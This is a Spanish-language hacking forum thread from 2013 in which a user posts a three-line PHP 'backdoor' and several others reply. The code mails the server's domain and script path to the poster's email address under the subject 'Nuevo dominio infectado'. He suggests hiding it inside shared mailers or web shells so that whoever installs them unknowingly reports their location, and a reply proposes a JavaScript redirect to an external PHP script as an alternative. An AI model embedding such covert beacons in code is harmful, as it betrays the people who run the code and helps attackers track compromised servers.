send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backdorizando un archivo PHP

  • 5 Respuestas
  • 2593 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« en: Enero 14, 2013, 08:54:02 pm »
Hola, esperando tengan una buena noche.
Hoy explicaré como backdorizar un archivo .PHP o puede ser .html
Bueno son 3 lineas las cuales nos serán de gran utilidad.
usaremos la variable global $_SERVER y la funcion mail()

Código: PHP
  1. <?php
  2. $domain = $_SERVER['SERVER_NAME'];//El dominio en el cual está nuestro archivo
  3. $ruta = $_SERVER['PHP_SELF'];//la ruta de el archivo
  4. You are not allowed to view links. Register or Login('okoltutos@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);//Manda un mail con la ruta
  5. ?>


¿Ideas?
Esto podría servir poniéndolo en algún mailer ó alguna shell y cuando el usuario entre a la shell o el mailer nos mandará un email con la ruta.

(Modificar mi email por el suyo en el primer parámetro de la función mail() ).


PD: No me hago responsable de el uso de esto. Estoy en contra de esas practicas pero... Hay que compartir y espero a más de uno le sirva.

Saludos!
Underc0de Manager!

Desconectado Oggy

  • *
  • Underc0der
  • Mensajes: 50
  • Actividad:
    0%
  • Reputación 0
  • Hola mundo cruel
    • Ver Perfil
    • Email
« Respuesta #1 en: Enero 14, 2013, 09:02:13 pm »
yo que solo pensaba que servias para ponerte borracho, esta genial para los que normalmente se acostumbran a usar tools sin examinarlas.
You are not allowed to view links. Register or Login
Nice brother.
PD: ahora no te vayas a poner a infectar las tools-

Desconectado [3V1L]

  • *
  • Underc0der
  • Mensajes: 19
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Enero 14, 2013, 09:09:44 pm »
gracias man!

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #3 en: Enero 14, 2013, 10:49:49 pm »
Me alegra que les haya sido útil.
Saludos.
Underc0de Manager!

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • No Aprendas para Hackear, Hackea para Aprender.
    • Ver Perfil
    • SeguridadBlanca - Seguridad Informática Perú
« Respuesta #4 en: Enero 14, 2013, 11:55:14 pm »
podrías acortar el code usando document.location con javascript y un .php externo.... así lo haría yo...


Saludos,
Dedalo
You are not allowed to view links. Register or Login

Desconectado Okol

  • *
  • Underc0der
  • Mensajes: 83
  • Actividad:
    0%
  • Reputación 0
  • Imaginando Programando & Avanzando!
    • Ver Perfil
    • Email
« Respuesta #5 en: Enero 15, 2013, 12:27:22 am »
habrá mil formas de hacer algo.
yo expliqué una bro.
saludos.
Underc0de Manager!

 

¿Te gustó el post? COMPARTILO!



Incrustar ejecutable dentro de un archivo de Adobe pdf

Iniciado por hacker403

Respuestas: 0
Vistas: 1447
Último mensaje Julio 18, 2010, 08:00:02 pm
por hacker403
Backdorizando Servidores Web con WeBaCoo

Iniciado por CalebBucker

Respuestas: 2
Vistas: 1826
Último mensaje Agosto 31, 2012, 10:49:25 am
por q3rv0